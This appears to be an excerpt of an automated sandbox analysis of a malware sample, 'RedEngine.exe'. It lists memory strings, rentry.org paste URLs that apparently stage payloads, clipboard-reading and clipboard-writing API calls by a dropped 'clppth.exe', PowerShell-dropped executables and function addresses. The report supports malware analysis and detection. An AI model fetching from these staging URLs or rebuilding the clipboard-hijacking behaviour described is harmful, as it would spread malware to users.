                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71BA2000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C716CF000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3779781800.000002768020B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_in_X
                        Source: powershell.exe, 00000003.00000002.1643088733.000001D468375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B60D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3781370507.0000019C71780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/pancek61
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/pancek6111111
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D458528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/pancek61111111111111/raw
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C71736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.apple.com/en-us/HT20P
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1637003082.0000019C71620000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1635575570.0000019C71619000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1984833829.00000276FE774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1635575570.0000019C71619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/htmu_
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3807174492.00007FFB0B5AF000.00000002.00000001.01000000.00000017.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3798203714.00007FFB025BA000.00000002.00000001.01000000.00000016.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1945052701.000002C498ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3801436155.00007FFB02B38000.00000008.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.python.org/psf/license/
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49709 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49730 version: TLS 1.2
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01998660 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,31_2_00007FFB01998660
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A8D70 OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,42_2_00007FFB1C5A8D70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A8BA0 GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,42_2_00007FFB1C5A8BA0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB01998660 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,31_2_00007FFB01998660
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B77F0 ClientToScreen,GetSystemMetrics,GetAsyncKeyState,GetAsyncKeyState,TrackPopupMenu,GetCursorPos,WindowFromPoint,42_2_00007FFB1C5B77F0
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000261E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_6e273257-d
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5BB830 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,42_2_00007FFB1C5BB830

                        System Summary

                        barindex
                        Powershell drops PE file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeJump to dropped file
                        Very long command line found
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: Commandline size = 2586
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: Commandline size = 2586Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A730D0 NtQueryInformationProcess,11_2_00A730D0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A730C9 NtQueryInformationProcess,11_2_00A730C9
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D4C40 WSAStartup,gethostbyname,socket,setsockopt,setsockopt,setsockopt,htons,sendto,sendto,recvfrom,recvfrom,ntohl,ntohl,ntohl,closesocket,WSACleanup,WSAGetLastError,closesocket,WSACleanup,SetLastError,WSAGetLastError,WSACleanup,SetLastError,31_2_648D4C40
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D3E30: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy,31_2_648D3E30
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7182011_2_00A71820
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7207011_2_00A72070
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7910911_2_00A79109
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7431811_2_00A74318
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7535911_2_00A75359
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A73CE011_2_00A73CE0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A714F811_2_00A714F8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7E42811_2_00A7E428
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A70C1011_2_00A70C10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7358811_2_00A73588
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A78D7011_2_00A78D70
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A756F811_2_00A756F8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7AE3811_2_00A7AE38
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7CE1011_2_00A7CE10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7D78011_2_00A7D780
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7BF0811_2_00A7BF08
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7B8A811_2_00A7B8A8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7181011_2_00A71810
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7206011_2_00A72060
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7A15811_2_00A7A158
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7430711_2_00A74307
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7AB6811_2_00A7AB68
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7EB5811_2_00A7EB58
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A70C0011_2_00A70C00
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7E41911_2_00A7E419
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A78D6011_2_00A78D60
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7AE2811_2_00A7AE28
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7666011_2_00A76660
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A7A75811_2_00A7A758
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_0495048811_2_04950488
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_04950ED811_2_04950ED8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_04959E2011_2_04959E20
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_0495A5C811_2_0495A5C8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D004011_2_049D0040
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D59D811_2_049D59D8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D64D811_2_049D64D8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D64C811_2_049D64C8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D000611_2_049D0006
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D621011_2_049D6210
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D10B011_2_049D10B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D10C011_2_049D10C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D5E9811_2_049D5E98
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_049D59C911_2_049D59C9
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_07264EE011_2_07264EE0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_07264ED111_2_07264ED1
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_0726016811_2_07260168
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_072611C011_2_072611C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_072688C811_2_072688C8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040C89813_2_0040C898
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040E95013_2_0040E950
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0041091013_2_00410910
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_004109D913_2_004109D9
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_004105E013_2_004105E0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0041158013_2_00411580
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0041099313_2_00410993
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0041060013_2_00410600
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040B34713_2_0040B347
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040F3C813_2_0040F3C8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE5C7414_2_00007FF741BE5C74
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BDFBD814_2_00007FF741BDFBD8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE4F1014_2_00007FF741BE4F10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC100014_2_00007FF741BC1000
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD7AAC14_2_00007FF741BD7AAC
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD0A6014_2_00007FF741BD0A60
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD128014_2_00007FF741BD1280
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE8A3814_2_00007FF741BE8A38
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BDD20014_2_00007FF741BDD200
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD91B014_2_00007FF741BD91B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE518C14_2_00007FF741BE518C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD2CC414_2_00007FF741BD2CC4
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD0C6414_2_00007FF741BD0C64
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD148414_2_00007FF741BD1484
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD73F414_2_00007FF741BD73F4
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE33BC14_2_00007FF741BE33BC
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE0B8414_2_00007FF741BE0B84
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC8B2014_2_00007FF741BC8B20
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD0E7014_2_00007FF741BD0E70
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC95FB14_2_00007FF741BC95FB
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BDCD6C14_2_00007FF741BDCD6C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD28C014_2_00007FF741BD28C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD107414_2_00007FF741BD1074
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BDD88014_2_00007FF741BDD880
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD504014_2_00007FF741BD5040
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC979B14_2_00007FF741BC979B
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC9FCD14_2_00007FF741BC9FCD
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE2F2014_2_00007FF741BE2F20
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BDFBD814_2_00007FF741BDFBD8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD1F3014_2_00007FF741BD1F30
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE572814_2_00007FF741BE5728
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648C661031_2_648C6610
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648C510031_2_648C5100
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D94F031_2_648D94F0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E946031_2_648E9460
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D847031_2_648D8470
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6490352231_2_64903522
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6491A69031_2_6491A690
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6490A68031_2_6490A680
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648C76A031_2_648C76A0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6494263031_2_64942630
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6492265031_2_64922650
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648CA65431_2_648CA654
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D578031_2_648D5780
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_649180B031_2_649180B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D701031_2_648D7010
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E618031_2_648E6180
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D61B031_2_648D61B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648EB1C031_2_648EB1C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6491915531_2_64919155
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648EE28031_2_648EE280
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_649292B031_2_649292B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E82A031_2_648E82A0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_649642F831_2_649642F8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E220031_2_648E2200
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6496423031_2_64964230
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6491B30031_2_6491B300
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6496430031_2_64964300
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E535031_2_648E5350
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648EFC1031_2_648EFC10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648ECC4031_2_648ECC40
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648EADA031_2_648EADA0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_64928DD031_2_64928DD0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648DCDD031_2_648DCDD0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E9D4031_2_648E9D40
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648C7E9031_2_648C7E90
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648EFE9031_2_648EFE90
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D8E3031_2_648D8E30
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D8FD031_2_648D8FD0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648CA88331_2_648CA883
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_649038B031_2_649038B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D081031_2_648D0810
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648CC84031_2_648CC840
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E985031_2_648E9850
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6491887031_2_64918870
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_649299D031_2_649299D0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648CA9E031_2_648CA9E0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648D590031_2_648D5900
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_6494090031_2_64940900
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E194031_2_648E1940
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_64919B7031_2_64919B70
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE5C7431_2_00007FF741BE5C74
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC100031_2_00007FF741BC1000
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD7AAC31_2_00007FF741BD7AAC
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD0A6031_2_00007FF741BD0A60
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD128031_2_00007FF741BD1280
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE8A3831_2_00007FF741BE8A38
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BDD20031_2_00007FF741BDD200
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD91B031_2_00007FF741BD91B0
